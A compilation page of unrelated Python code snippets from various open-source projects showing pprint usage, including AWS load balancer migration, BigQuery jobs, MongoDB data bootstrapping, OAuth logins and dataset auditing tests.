Example #1
0
def test_branched():
    node = {'tiger': {'zip_left': '43210'}}
    key = 'tiger:zip_right'
    val = '01234'
    add_branched_item(key, val, node)
    pprint(node)
    assert node == {'tiger': {'zip_left': '43210', 'zip_right': '01234'}}
Example #2
0
def main():
    parser = argparse.ArgumentParser(description='Analyze a bandersnatch mirror.')
    parser.add_argument('--json',
                       help='save raw data to a json file',
                       default=None)
    args = parser.parse_args()
    concurrency = 8
    root = "/var/spool/pypi/web/packages/source/"
    p = Pool()
    results = {}
    try:
        try:
            for path, result in \
                p.imap_unordered(analyse_sdist, yield_packages(root)):
                results[path] = result
            p.close()
        except:
            p.terminate()
            raise
    finally:
        p.join()
    if args.json:
        with open(args.json, 'wb') as f:
            f.write(json.dumps(results))
    pprint.pprint(results)
Example #3
0
    def any(self, provider_name):
        logging.info("logging in -- PROVIDER NAME IS: %s", provider_name)

        result = authomatic.login(Webapp2Adapter(self), provider_name)
        self.response.set_cookie('result', str(result))
        # user = User(result=result)
        # user.put()
        pprint.pprint('RESULT IS %s' % result)

        if result:
            if result.user:
                result.user.update()
                # Save the user name and ID to cookies that we can use it in other handlers.
                self.response.set_cookie('user_id', result.user.id)
                logging.info('SET COOKIE WITH VALUE OF: %s', result.user.id)
                self.response.set_cookie('user_name', urllib.quote(result.user.name))

                if result.user.credentials:
                    # Serialize credentials and store it as well.
                    serialized_credentials = result.user.credentials.serialize()
                    self.response.set_cookie('credentials', serialized_credentials)

            elif result.error:
                self.response.set_cookie('error', urllib.quote(result.error.message))

            self.redirect('/')
Example #4
0
    def _get_cutters(self):
        """
        Returns list of cutters available. Usbrelay cutters must be configured
        manually at topology_builder.json file

        Returns:
            List of aft.Cutter objects
        """
        cutters = []
        clewares = ClewareCutter.get_available_cutters()
        for c in clewares:
            for channel in range(c["sockets"]):
                param = {"cutter": c["cutter"], "channel": str(channel)}
                cutter = ClewareCutter(param)
                cutters.append(cutter)

        for port in self._config["edison"]["power_cutters"]:
            config = {"cutter": port}
            cutters.append(Usbrelay(config))

        if self._verbose:
            print "Acquired cutters:"

            for c in cutters:
                pprint.pprint(c.get_cutter_config())
            print ""




        return cutters
Example #5
0
def main():
    try:
        input = TestInput.TestInputParser.get_test_input(sys.argv)
    except AttributeError:
        print USAGE
    else:
        all_samples = list()
        while True:
            try:
                samples =\
                    [collect_index_barriers(s) for s in input.servers] +\
                    [collect_couchdb_tasks(s) for s in input.servers] +\
                    [collect_active_tasks(input.servers[0])]
                samples = filter(lambda sample: sample, samples)
                all_samples.extend(samples)

                pprint(samples)
                time.sleep(input.param('interval', 5))
            except KeyboardInterrupt:
                break
        filename = 'active_tasks_{0}.json'\
            .format(time.strftime('%Y%m%d_%H%M', time.localtime(time.time())))
        with open(filename, 'w') as fh:
            print '\nSaving all stats to: {0}'.format(filename)
            fh.write(json.dumps(all_samples, indent=4, sort_keys=True))
Example #6
0
    def submit(self):
        try:
            from modules.wma import makeRequest,approveRequest
            from wmcontrol import random_sleep
            print '\n\tFound wmcontrol\n'
        except:
            print '\n\tUnable to find wmcontrol modules. Please include it in your python path\n'
            if not self.testMode:
                print '\n\t QUIT\n'
                sys.exit(-17)

        import pprint
        for (n,d) in self.chainDicts.items():
            if self.testMode:
                print "Only viewing request",n
                print pprint.pprint(d)
            else:
                #submit to wmagent each dict
                print "For eyes before submitting",n
                print pprint.pprint(d)
                print "Submitting",n,"..........."
                workFlow=makeRequest(self.wmagent,d,encodeDict=True)
                approveRequest(self.wmagent,workFlow)
                print "...........",n,"submitted"
                random_sleep()
Example #7
0
def request():
  """Run when invoking slapos request. Request an instance."""
  # Parse arguments and inititate needed parameters
  # XXX-Cedric: move argument parsing to main entry point
  options = check_request_args()
  config = Config(options, options.configuration_file)
  local = init(config)
  # Request instance
  print("Requesting %s..." % config.reference)
  if config.software_url in local:
    config.software_url = local[config.software_url]
  try:
    partition = local['slap'].registerOpenOrder().request(
      software_release = config.software_url,
      partition_reference = config.reference,
      partition_parameter_kw = config.configuration,
      software_type = config.type,
      filter_kw = config.node,
      shared = config.slave
    )
    print "Instance requested.\nState is : %s." % partition.getState()
    print "Connection parameters of instance are:"
    pprint.pprint(partition.getConnectionParameterDict())
    print "You can rerun command to get up-to-date informations."
  except ResourceNotReady:
    print("Instance requested. Master is provisionning it. Please rerun in a "
        "couple of minutes to get connection informations")
    exit(2)
Example #8
0
 def printReport(self):
   import pprint
   print "Probabilities:"
   pprint.pprint(self.latest())
   print "Errors:"
   pprint.pprint(self.errors[-1])
   print "SSE: %s" % self.sse[-1]
Example #9
0
def barcode_ajax():
  """
  Called when the barcode form submitted
  """
  print('barcode_ajax() TOP =========================================================================')
  print('-------------------')
  pprint(request)
  print('-------------------')


  # form data is in request
  if 'action' in request.form: # HTTP POST data comes in request object
    action  = request.form['action'] # sb_get_job_info, sb_get_part_info, etc..
  else:
    return json_punt()

  if 'arg1' in request.form:
    a1 = request.form['arg1']
  else:
    a1 = ''

  if 'arg2' in request.form:
    a2 = request.form['arg2']
  else:
    a2 = ''

  if 'arg3' in request.form:
    a3 = request.form['arg3']
  else:
    a3 = ''

  if (action == 'sb_execute_local'):
    #
    # execute locally
    #
    if (ex_local(a1,a2,a3)):
      m = 'barcode_ajax(): execute local: OK'
      d = {'error':0,'as_data':m,'as_html':m}
      return jsonify(d)
    else:
      json_punt()
      return

  else:
    #
    # send it up to the main server
    #
    r  =  aj_query(query = action,arg1 = a1, arg2 = a2, arg3 = a3)

    print('-------------------')

    j = json.loads(r.text)
    pprint(json.dumps(j))

    print('-------------------')

    try:
      return jsonify(j)
    except:
      return json_punt()
Example #10
0
def readJsonFile(jFile):
	with open(jFile, 'r') as inFile:
		params = json.load(inFile)

	getAnyRegret('Input_files/182-summary.json', params, 'example.json')

	pprint.pprint(params)	
Example #11
0
def read_available_plugins(raise_error=False):
    import json, bz2
    display_plugins = []
    try:
        raw = get_https_resource_securely(INDEX_URL)
        if not raw:
            return
        raw = json.loads(bz2.decompress(raw))
    except:
        if raise_error:
            raise
        traceback.print_exc()
        return
    for plugin in itervalues(raw):
        try:
            display_plugin = DisplayPlugin(plugin)
            get_installed_plugin_status(display_plugin)
            display_plugins.append(display_plugin)
        except:
            if DEBUG:
                prints('======= Plugin Parse Error =======')
                traceback.print_exc()
                import pprint
                pprint.pprint(plugin)
    display_plugins = sorted(display_plugins, key=lambda k: k.name)
    return display_plugins
Example #12
0
File: sort.py Project: jzlink/DPLA
def test():
    test = Profile()
    sortedFields = test.sort()

#    pprint.pprint(test.DPLAData)
#    print len(test.DPLAData[0]['sourceResource'])
    pprint.pprint(sortedFields)
def get_ospf(vmid):
	
	result = FabricUtilNFV.get_vyatta_conf(vmid, "$SHOW protocols ospf")
	
	import pprint
	results = elementList.parseString(result)
	pprint.pprint( results.asList() )
	
	print '------------------------------'
	
	result = {"areas":[], "access-list":[], "redist-list":[]}
	for depth1 in results.asList():
		if depth1[0] in ['auto-cost','parameters']:
			result[depth1[0] + "_" + depth1[1][0][0]] = depth1[1][0][1]
			
		elif 'area' == depth1[0]:
			result['areas'].extend(parse_ospf_list(depth1))
		elif 'access-list' == depth1[0]:
			result['access-list'].extend(parse_ospf_list(depth1))
		elif 'redistribute' == depth1[0]:
			for item in depth1[1]:
				prot = {}
				prot['protocol'] = item[0]
				for item2 in item[1]:
					prot[item2[0]] = item2[1]
				result['redist-list'].append(prot)
		else:
			result[depth1[0]] = depth1[1]
			
		
	return {"success":"success", "msg":json.dumps(result)}
 def test_parse_map(self):
     query = "fantasy_content.users{0}.user[1].games{0}.game[1]"
     r = self.parser.parse(query, self.json_obj)
     
     pprint(r)
     
     self.assertIsNotNone(r)
Example #15
0
    def pprint(self, resource, out=sys.stdout):
        """Pretty prints a resource or part of it.

        """

        if (isinstance(resource, dict)
                and 'object' in resource
                and 'resource' in resource):

            resource_id = resource['resource']
            if (SOURCE_RE.match(resource_id) or DATASET_RE.match(resource_id)
                    or MODEL_RE.match(resource_id)
                    or EVALUATION_RE.match(resource_id)
                    or ENSEMBLE_RE.match(resource_id)):
                out.write("%s (%s bytes)\n" % (resource['object']['name'],
                                               resource['object']['size']))
            elif PREDICTION_RE.match(resource['resource']):
                objective_field_name = (resource['object']['fields']
                                                [resource['object']
                                                 ['objective_fields'][0]]
                                                ['name'])
                input_data = (dict([[resource['object']['fields'][key]['name'],
                                    value]
                                    for key, value in
                                    resource['object']['input_data'].items()]))
                prediction = (
                    resource['object']['prediction']
                            [resource['object']['objective_fields'][0]])
                out.write("%s for %s is %s\n" % (objective_field_name,
                                                 input_data,
                                                 prediction))
            out.flush()
        else:
            pprint.pprint(resource, out, indent=4)
Example #16
0
def main():
    if APP_KEY == '' or APP_SECRET == '':
        sys.stderr.write("ERROR: Set your APP_KEY and APP_SECRET at the top of %r.\n" % __file__)
        sys.exit(1)

    prog_name, args = sys.argv[0], sys.argv[1:]
    if len(args) != 2:
        sys.stderr.write("Usage: %s <oauth1-access-token-key> <oauth1-access-token-secret>\n")
        sys.exit(1)

    access_token_key, access_token_secret = args

    sess = session.DropboxSession(APP_KEY, APP_SECRET)
    sess.set_token(access_token_key, access_token_secret)
    c = client.DropboxClient(sess)

    sys.stdout.write("Creating OAuth 2 access token...\n")
    oauth2_access_token = c.create_oauth2_access_token()

    sys.stdout.write("Using OAuth 2 access token to get account info...\n")
    c2 = client.DropboxClient(oauth2_access_token)
    pprint.pprint(c2.account_info(), stream=sys.stdout)

    sys.stdout.write("Disabling OAuth 1 access token...\n")
    c.disable_access_token()
Example #17
0
def main(argv):
    start_time = datetime.datetime.now()
    parser = ArgumentParser()
    parser.add_argument('--number', '-n', default='10', help='Number of entries to show')
    parser.add_argument('--outfile', '-o', action='store_true', default=False, dest='out',
                        help='File to output full listing of files')
    parser.add_argument('paths', help='Directory to list size of.')
    args = parser.parse_args()

    out_file = 'disk-usage.json'
    files_dict = {}
    paths_to_do = args.paths
    with open(out_file, 'w') as out_file_handle:
        for path_to_do in paths_to_do:
            for curdir, subdir, files in os.walk(path_to_do):
                for file in files:
                    if os.path.exists(os.path.join(curdir, file)):
                        files_dict[os.path.join(curdir, file)] = os.stat(os.path.join(curdir, file)).st_size
                        out_file_handle.write(
                            '%s,%s\n' % (os.path.join(curdir, file), os.stat(os.path.join(curdir, file)).st_size))

    sorted_files = (sorted(files_dict.iteritems(), key=operator.itemgetter(1), reverse=True))
    nice_numbers = [(file, convert_bytes(bytes)) for file, bytes in sorted_files]

    end_time = datetime.datetime.now()
    delta_time = end_time - start_time

    print delta_time
    if args.number == 'all':
        pprint(nice_numbers)
    else:
        pprint(nice_numbers[:int(args.number)])
Example #18
0
def save_hw(items, name, hwdir):
    'Save hw items for inspection on the server.'
    try:
        filename = os.path.join(hwdir, name + '.hw')
        pprint.pprint(items, stream=open(filename, 'w'))
    except Exception, xcpt:
        log("exception while saving hw file: %s" % str(xcpt))
def collect_and_show_garbage():
    "Mostra che garbage è presente."
    print 'Raccolta...'
    n = gc.collect()
    print 'Oggetti irraggiungili:', n
    print 'Garbage:', 
    pprint(gc.garbage)
Example #20
0
def test():
    # NOTE: if you are running this code on your computer, with a larger dataset, 
    # call the process_map procedure with pretty=False. The pretty=True option adds 
    # additional spaces to the output, making it significantly larger.
    data = process_map('example.osm', False)
    pprint.pprint(data)
    correct_first_elem = {
        "id": "261114295", 
        "visible": "true", 
        "type": "node", 
        "pos": [41.9730791, -87.6866303], 
        "created": {
            "changeset": "11129782", 
            "user": "******", 
            "version": "7", 
            "uid": "451048", 
            "timestamp": "2012-03-28T18:31:23Z"
        }
    }
    assert data[0] == correct_first_elem
    assert data[-1]["address"] == {
                                    "street": "West Lexington St.", 
                                    "housenumber": "1412"
                                      }
    assert data[-1]["node_refs"] == [ "2199822281", "2199822390",  "2199822392", "2199822369", 
                                    "2199822370", "2199822284", "2199822281"]
Example #21
0
def save_cmdb(cfg_dir, name, cmdb):
    'Save the cmdb.'
    filename = cmdb_filename(cfg_dir, name)
    try:
        pprint.pprint(cmdb, stream=open(filename, 'w'))
    except IOError, xcpt:
        log("exception while processing CMDB %s" % str(xcpt))
Example #22
0
def bootstrap_userstories():
    print "Mongo DB userstories: %s" % MUserStory.objects().count()
    # db.userstories.drop()
    print "Dropped! Mongo DB userstories: %s" % MUserStory.objects().count()

    print "UserStories: %s" % UserStory.objects.all().count()
    pprint(db.userstories.index_information())

    userstories = UserStory.objects.all().values()
    for userstory in userstories:
        try:
            story = Story.objects.get(pk=userstory['story_id'])
        except Story.DoesNotExist:
            continue
        try:
            userstory['story'] = MStory.objects(story_feed_id=story.story_feed.pk, story_guid=story.story_guid)[0]
        except:
            print '!',
            continue
        print '.',
        del userstory['id']
        del userstory['opinion']
        del userstory['story_id']
        try:
            MUserStory(**userstory).save()
        except:
            print '\n\n!\n\n'
            continue

    print "\nMongo DB userstories: %s" % MUserStory.objects().count()
Example #23
0
def bootstrap_feedpages():
    print "Mongo DB feed_pages: %s" % MFeedPage.objects().count()
    # db.feed_pages.drop()
    print "Dropped! Mongo DB feed_pages: %s" % MFeedPage.objects().count()

    print "FeedPages: %s" % FeedPage.objects.count()
    pprint(db.feed_pages.index_information())

    feeds = Feed.objects.all().order_by('-average_stories_per_month')
    feed_count = feeds.count()
    i = 0
    for feed in feeds:
        i += 1
        print "%s/%s: %s" % (i, feed_count, feed,)
        sys.stdout.flush()
        
        if not MFeedPage.objects(feed_id=feed.pk):
            feed_page = FeedPage.objects.filter(feed=feed).values()
            if feed_page:
                del feed_page[0]['id']
                feed_page[0]['feed_id'] = feed.pk
                try:
                    MFeedPage(**feed_page[0]).save()
                except:
                    print '\n\n!\n\n'
                    continue
        

    print "\nMongo DB feed_pages: %s" % MFeedPage.objects().count()
Example #24
0
def main():
    api = PopIt(instance = 'professors', hostname = '127-0-0-1.org.uk', port = 3000, user = '******', password = '******')

    # Create
    print("CREATE")
    new = api.person.post({'name': 'Albert Keinstein'})
    pprint(new)

    id = new['result']['_id']

    # Update
    print("UPDATE")
    result = api.person(id).put({"name": "Albert Einstein"})
    pprint(result)

    # Read
    print("READ")
    result = api.person(id).get()
    pprint(result)

    # read all
    results = api.person().get()
    pprint(results)

    # Delete
    print("DELETE")
    result = api.person(id).delete()
    pprint(result)
Example #25
0
def metadata_catalog(fits_filenames):
    "Histogram the metadata values in list of fits files."
    
    common, optional = metadata_field_use(fits_filenames)
    allfields = optional.union(common)
    histo = collections.defaultdict(int)
    values = collections.defaultdict(set)
    for fname in fits_filenames:
        hdulist = pyfits.open(fname)
        hdr = hdulist[0].header
        for field in allfields:
            if field in hdr:
                histo[field] += 1
                values[field].add(str(hdr[field]))
        hdulist.close()

    print('\n', '~'*78)
    print('Histogram of field use:')
    pprint(histo)

    print('\n', '~'*78)
    
    max_unique = 0.80
    print('Values used (max %s unique values):'%(max_unique))
    #! pprint(values)
    for k,v in values.items():
        if float(len(v))/len(fits_filenames) > max_unique: continue
        print('%8s: %s'%(k,', '.join(v)))
Example #26
0
def docdump(modname):
    mod = __import__( modname )

    print "module:", modname
    try:
        print modname+".__file__:", mod.__file__
    except AttributeError: print "undefined, probably built-in"

    print "\n-----------", modname+ ".__doc__: -------------"
    print mod.__doc__

    print "\n-----------", modname+ ".__dict__: -------------"
    pprint.pprint( mod.__dict__ )

    print "\n-----------", modname+ ".item's __doc__s: -------------"
    dic = mod.__dict__
    items = dic.keys()
    items.sort()
    for k in items:
        try:
            doc = dic[k].__doc__
            print "-----", k
            print doc
        except AttributeError:
            pass
    print "=================="
Example #27
0
    def __init__(self, funcs, ops, args, consts):
        # globals passed to eval - contains all constant, mangled op and mangled function names. Values are impls
        self.globals_by_name = {}
        # symbol tables
        self.var_types_by_name = {}
        self.func_types_by_name_types_in = {}
        self.op_types_by_op_types_in = {}
        self.args = []

        for name, type_out, _, val in consts:
            assert _ is None, "Constant %s not allowed types_in." % name
            self._check_name(name, internal=True)
            self.globals_by_name[name] = val
            self.var_types_by_name[name] = type_out
        for name, type_out, _, _ in args:
            self.args.append(name)
            self.var_types_by_name[name] = type_out
        for name, type_out, types_in, impl in funcs:
            self._check_name(name, internal=True)
            name_types_in = (name, types_in)
            assert name_types_in not in self.func_types_by_name_types_in, "Function name/type %r already exists" % (name_types_in,)
            assert name not in names_by_op
            self.func_types_by_name_types_in[name_types_in] = type_out
            self.globals_by_name[self._mangle(*name_types_in)] = impl
        for op, type_out, types_in, impl in ops:
            op_types_in = (op, types_in)
            assert op_types_in not in self.func_types_by_name_types_in, "Operator name/type %r already exists" % (op_types_in,)
            self.op_types_by_op_types_in[op_types_in] = type_out
            self.globals_by_name[self._mangle(*op_types_in)] = impl
        pprint(self.globals_by_name)
Example #28
0
def bootstrap_stories():
    print "Mongo DB stories: %s" % MStory.objects().count()
    # db.stories.drop()
    print "Dropped! Mongo DB stories: %s" % MStory.objects().count()

    print "Stories: %s" % Story.objects.all().count()
    pprint(db.stories.index_information())

    feeds = Feed.objects.all().order_by('-average_stories_per_month')
    feed_count = feeds.count()
    i = 0
    for feed in feeds:
        i += 1
        print "%s/%s: %s (%s stories)" % (i, feed_count,
                            feed, Story.objects.filter(story_feed=feed).count())
        sys.stdout.flush()
    
        stories = Story.objects.filter(story_feed=feed).values()
        for story in stories:
            # story['story_tags'] = [tag.name for tag in Tag.objects.filter(story=story['id'])]
            try:
                story['story_tags'] = json.decode(story['story_tags'])
            except:
                continue
            del story['id']
            del story['story_author_id']
            try:
                MStory(**story).save()
            except:
                continue

    print "\nMongo DB stories: %s" % MStory.objects().count()
Example #29
0
def test():
    fieldtypes = audit_file(CITIES, FIELDS)

    pprint.pprint(fieldtypes)

    assert fieldtypes["areaLand"] == set([type(1.1), type([]), type(None)])
    assert fieldtypes["areaMetro"] == set([type(1.1), type(None)])
Example #30
0
def bootstrap_classifiers():
    for sql_classifier, mongo_classifier in ((ClassifierTitle, MClassifierTitle), 
                                             (ClassifierAuthor, MClassifierAuthor), 
                                             (ClassifierFeed, MClassifierFeed),
                                             (ClassifierTag, MClassifierTag)):
        collection = mongo_classifier.meta['collection']
        print "Mongo DB classifiers: %s - %s" % (collection, mongo_classifier.objects().count())
        # db[collection].drop()
        print "Dropped! Mongo DB classifiers: %s - %s" % (collection, mongo_classifier.objects().count())

        print "%s: %s" % (sql_classifier._meta.object_name, sql_classifier.objects.all().count())
        pprint(db[collection].index_information())
        
        for userclassifier in sql_classifier.objects.all().values():
            del userclassifier['id']
            if sql_classifier._meta.object_name == 'ClassifierAuthor':
                author = StoryAuthor.objects.get(pk=userclassifier['author_id'])
                userclassifier['author'] = author.author_name
                del userclassifier['author_id']
            if sql_classifier._meta.object_name == 'ClassifierTag':
                tag = Tag.objects.get(pk=userclassifier['tag_id'])
                userclassifier['tag'] = tag.name
                del userclassifier['tag_id']
            print '.',
            try:
                mongo_classifier(**userclassifier).save()
            except:
                print '\n\n!\n\n'
                continue
            
        print "\nMongo DB classifiers: %s - %s" % (collection, mongo_classifier.objects().count())
Example #31
0
 def show_config(self):
     """ Print all options of charts"""
     pprint(self._option)
def get_alb_data(elb_data, region, load_balancer_name):
    if debug:
        print("building the Application Load Balancer data structure")
    # this is used for building the load balancer spec
    alb_data = {
        'VpcId':
        elb_data['LoadBalancerDescriptions'][0]['VPCId'],
        'Region':
        region,
        'Alb_name':
        elb_data['LoadBalancerDescriptions'][0]['LoadBalancerName'],
        'Subnets':
        elb_data['LoadBalancerDescriptions'][0]['Subnets'],
        'Security_groups':
        elb_data['LoadBalancerDescriptions'][0]['SecurityGroups'],
        'Scheme':
        elb_data['LoadBalancerDescriptions'][0]['Scheme'],
        'Tags':
        elb_data['TagDescriptions'][0]['Tags'],
        'listeners': [],
        'target_group_attributes': [],
        'target_group_arns': []
    }

    # this is used for building the listeners specs
    for elb_listener in elb_data['LoadBalancerDescriptions'][0][
            'ListenerDescriptions']:
        # If there is a LBCookieStickinessPolicy, append TG attriubtes
        if len(elb_listener['PolicyNames']) > 0:
            if 'LBCookieStickinessPolicy' in elb_listener['PolicyNames'][0]:
                for policy in elb_data['PolicyDescriptions']:
                    if elb_listener['PolicyNames'][0] == policy['PolicyName']:
                        listener = {
                            'Protocol':
                            elb_listener['Listener']['Protocol'],
                            'Port':
                            elb_listener['Listener']['LoadBalancerPort'],
                            'TargetGroup_Port':
                            elb_listener['Listener']['InstancePort'],
                            'TargetGroup_Protocol':
                            elb_listener['Listener']['InstanceProtocol']
                        }
                        TargetGroup_Attribute = {
                            'dereg_timeout_seconds_delay':
                            str(elb_data['LoadBalancerAttributes']
                                ['ConnectionDraining']['Timeout']),
                            'stickiness.enabled':
                            'true',
                            'stickiness.type':
                            'lb_cookie',
                            'stickiness_policy':
                            policy['PolicyName'].split('-')[3],
                            'stickiness.lb_cookie.duration_seconds':
                            policy['PolicyAttributeDescriptions'][0]
                            ['AttributeValue'],
                            'TargetGroup_Port':
                            elb_listener['Listener']['InstancePort']
                        }
                        if listener['Protocol'] == "HTTPS":
                            listener['Certificates'] = [{
                                'CertificateArn':
                                elb_listener['Listener']['SSLCertificateId']
                            }]
            else:
                listener = {
                    'Protocol':
                    elb_listener['Listener']['Protocol'],
                    'Port':
                    elb_listener['Listener']['LoadBalancerPort'],
                    'TargetGroup_Port':
                    elb_listener['Listener']['InstancePort'],
                    'TargetGroup_Protocol':
                    elb_listener['Listener']['InstanceProtocol']
                }
                TargetGroup_Attribute = {
                    'dereg_timeout_seconds_delay':
                    str(elb_data['LoadBalancerAttributes']
                        ['ConnectionDraining']['Timeout']),
                    'TargetGroup_Port':
                    elb_listener['Listener']['InstancePort']
                }
                if listener['Protocol'] == "HTTPS":
                    listener['Certificates'] = [{
                        'CertificateArn':
                        elb_listener['Listener']['SSLCertificateId']
                    }]
            # TGs is not per unique backend port as two TGs might have two
            # different stickiness policy
            alb_data['listeners'].append(listener)
            alb_data['target_group_attributes'].append(TargetGroup_Attribute)
    # this is used for building the target groups
    '''
    # We need to create more target group if ELB front port has Duration-Based sticky policy
    # '''

    alb_data['target_groups'] = []
    hc_target = elb_data['LoadBalancerDescriptions'][0]['HealthCheck'][
        'Target']
    # Append unique stickiness policy name to Target Group Name
    for listener in alb_data['listeners']:
        for target_group_attribute in alb_data['target_group_attributes']:
            target_group = {
                'HealthCheckTimeoutSeconds':
                elb_data['LoadBalancerDescriptions'][0]['HealthCheck']
                ['Timeout']
            }
            # We only offer 15 seconds minimum health check interval
            if elb_data['LoadBalancerDescriptions'][0]['HealthCheck'][
                    'Interval'] < 15:
                print(
                    "HealthCheck Interval is less than 15 seconds! Setting it to 15 seconds"
                )
                target_group['HealthCheckIntervalSeconds'] = 15
            else:
                target_group['HealthCheckIntervalSeconds'] = elb_data[
                    'LoadBalancerDescriptions'][0]['HealthCheck']['Interval']
            target_group['HealthyThresholdCount'] = elb_data[
                'LoadBalancerDescriptions'][0]['HealthCheck'][
                    'HealthyThreshold']
            target_group['UnhealthyThresholdCount'] = elb_data[
                'LoadBalancerDescriptions'][0]['HealthCheck'][
                    'UnhealthyThreshold']
            target_group['HealthCheckPath'] = '/' + hc_target.split('/', 1)[1]
            target_group['HealthCheckPort'] = hc_target[hc_target.index(':') +
                                                        1:hc_target.index('/')]
            target_group['HealthCheckProtocol'] = hc_target.split(':')[0]
            target_group['VpcId'] = elb_data['LoadBalancerDescriptions'][0][
                'VPCId']
            if listener['TargetGroup_Port'] == target_group_attribute[
                    'TargetGroup_Port']:
                target_group['Port'] = listener['TargetGroup_Port']
                target_group['Protocol'] = listener['TargetGroup_Protocol']
                if 'stickiness.type' in target_group_attribute:
                    target_group[
                        'Name'] = load_balancer_name[:23] + "-tg-" + str(
                            listener['TargetGroup_Port']) + "-" + (
                                target_group_attribute['stickiness_policy'])
                    # Only append unique Target Group
                    if not any(tg['Name'] == target_group['Name']
                               for tg in alb_data['target_groups']):
                        alb_data['target_groups'].append(target_group)
                else:
                    target_group[
                        'Name'] = load_balancer_name[:23] + "-tg-" + str(
                            listener['TargetGroup_Port'])
                    # Only append unique Target Group
                    if not any(tg['Name'] == target_group['Name']
                               for tg in alb_data['target_groups']):
                        alb_data['target_groups'].append(target_group)

    # create alb attributes
    alb_data['attributes'] = []
    attributes = []
    attribute = {
        'Key':
        'idle_timeout.timeout_seconds',
        'Value':
        str(elb_data['LoadBalancerAttributes']['ConnectionSettings']
            ['IdleTimeout'])
    }
    attributes.append(attribute)
    if elb_data['LoadBalancerAttributes']['AccessLog']['Enabled']:
        attribute = {
            'Key':
            'access_logs.s3.enabled',
            'Value':
            str(elb_data['LoadBalancerAttributes']['AccessLog']
                ['Enabled']).lower()
        }
        attributes.append(attribute)
        attribute = {
            'Key':
            'access_logs.s3.bucket',
            'Value':
            elb_data['LoadBalancerAttributes']['AccessLog']['S3BucketName']
        }
        attributes.append(attribute)
        # we don't specify the prefix key if the prefix is root
        if elb_data['LoadBalancerAttributes']['AccessLog'][
                'S3BucketPrefix'] != '':
            attribute = {
                'Key':
                'access_logs.s3.prefix',
                'Value':
                elb_data['LoadBalancerAttributes']['AccessLog']
                ['S3BucketPrefix']
            }
            attributes.append(attribute)
    alb_data['attributes'] = attributes
    alb_data['instanceIds'] = []
    for instance in elb_data['LoadBalancerDescriptions'][0]['Instances']:
        alb_data['instanceIds'].append(instance['InstanceId'])
    if debug:
        print("alb_data:")
        pprint(alb_data)
    return alb_data
Example #33
0
def split_table_by_chr(chromosome, project_id, dataset_id, log):
    # this is a new connection to the new project
    bigquery_service = get_service()
    jobCollection = bigquery_service.jobs()

    try:
        query_request = bigquery_service.jobs()
        # maybe there is a nice way to format this one?
        query = """\
            SELECT data.ParticipantBarcode AS ParticipantBarcode, data.SampleBarcode AS SampleBarcode, data.SampleTypeLetterCode AS SampleTypeLetterCode, \
                data.AliquotBarcode AS AliquotBarcode, data.Platform AS Platform, data.Study AS Study, data.Probe_Id AS Probe_Id, data.Beta_Value as Beta_Value 
            FROM \
                ( \
                  SELECT IlmnID \
                  FROM [platform_reference.methylation_annotation] \
                  WHERE ( CHR == "{0}")\
                ) AS ids \
            JOIN EACH \
                (\
                  SELECT * \
                  FROM [{1}.Methylation] \
                ) AS data \
            ON ids.IlmnID == data.Probe_Id""".format(chromosome, dataset_id)

        log.info('importing chromosome %s\n%s' % (chromosome, query))
        #        query_data = {'query': query}
        query_data = {
            'configuration': {
                'query': {
                    'query': query,
                    'useQueryCache': False,
                    'destinationTable': {
                        'projectId': project_id,
                        'datasetId': dataset_id,
                        'tableId': 'Methylation_chr{0}'.format(chromosome)
                    },
                    'createDisposition': 'CREATE_IF_NEEDED',
                    'writeDisposition': 'WRITE_EMPTY',
                    'allowLargeResults': True
                }
            }
        }
        insertResponse = query_request.insert(projectId=project_id,
                                              body=query_data).execute()
        # Ping for status until it is done, with a short pause between calls.
        while True:
            result = jobCollection.get(
                projectId=project_id,
                jobId=insertResponse['jobReference']['jobId']).execute()
            status = result['status']
            if 'DONE' == status['state']:
                if 'errorResult' in status and status['errorResult']:
                    log.error(
                        'an error occurred completing import at \'%s\': %s \'%s\' for chormosome %s'
                        % (status['errorResult']['location'],
                           status['errorResult']['reason'],
                           status['errorResult']['message'], chromosome))
                else:
                    log.info('completed import chromosome %s' % (chromosome))
                break
            if 'errors' in status and status['errors'] and 0 < len(
                    status['errors']):
                for error in status['errors']:
                    log.warning('\terror while importing chromosome %s: %s' %
                                (chromosome, error))
            log.info(
                '\tWaiting for the import to complete for chromosome %s...' %
                (chromosome))
            time.sleep(20)

    except HttpError as err:
        print 'Error:', pprint.pprint(err.content)

    except AccessTokenRefreshError:
        print(
            "Credentials have been revoked or expired, please re-run"
            "the application to re-authorize")
Example #34
0
import sys

sys.stdin = open('input.txt')

N = int(input())
K = int(input())

B = []
A = [[0] * N for _ in range(N)]
for y in range(1, N + 1):
    for x in range(1, N + 1):
        A[y - 1][x - 1] = y * x
        B.append(y * x)
from pprint import pprint
pprint(A)
B.sort()
print(B)
print(B[K - 1])

low = 1
high = N * N
while low <= high:
    mid = (low + high) // 2

    cnt = 0
    for i in range(1, N + 1):
        cnt += (mid // i)
    if cnt > K + 1:
        high = mid - 1
    else:
        low = mid + 1
#How many different ways can you combine two of the letters from "abcd"?

len(list(combinations("abcd", 2)))

## Save this file as profiles.json inside of your exercises directory. 
# Use the load function from the json module to open this file, it will 
# produce a list of dictionaries. Using this data, write some code that 
# calculates and outputs the following information:

import json
from pprint import pprint

new_dictionary = json.load(open("profiles.json"))

pprint(new_dictionary)

new_dictionary[0].keys() # This returns all keys in a dictionary

# Total number of users

len([x['_id'] for x in new_dictionary])     

# Result = 19

# Number of active users
len([x['_id'] for x in new_dictionary if x['isActive']]) 

# Result = 9

# Number of inactive users
Example #36
0
    def unit_size(self, children):
        return {"quantity": children[0].children[0], "unit": children[1]}

    def ingredient(self, children):
        result = {}
        for child in children:
            if child.data == "quantity":
                result['quantity'] = child.children[0]
            if child.data == "unit":
                result['unit'] = child.children[0]
            if child.data == "base_ingredient":
                result["base_ingredient"] = " ".join(
                    [x.value.strip() for x in child.children])

        return result


def parse_ingredient(string):
    ''' parses ingredient to structured dict '''
    tree = parser.parse(string)

    return IngredientTransformer().transform(tree)


if __name__ == "__main__":
    tree = parser.parse("10 jar sauce")
    print(tree)
    print(tree.pretty())
    tree = IngredientTransformer().transform(tree)
    pprint.pprint(tree)
Example #37
0
 def _print(self):
     print("\n==================Options=================")
     pprint(vars(self.opt), indent=4)
     print("==========================================\n")
Example #38
0
async def main():
    from pprint import pprint

    from bot.enums import OrderType

    exchange = Binance()
    exchange.set_market_type("linear_perpetual")
    exchange.use_test_net()
    await exchange.prepare()
    exchange.auth({
        "api_key": "",
        "secret": "",
    })

    pprint(exchange._ccxt_exchange.markets["ETH/USDT"]["precision"])

    position = await exchange.fetch_position(pair="ETHUSDT")
    print("Position:")
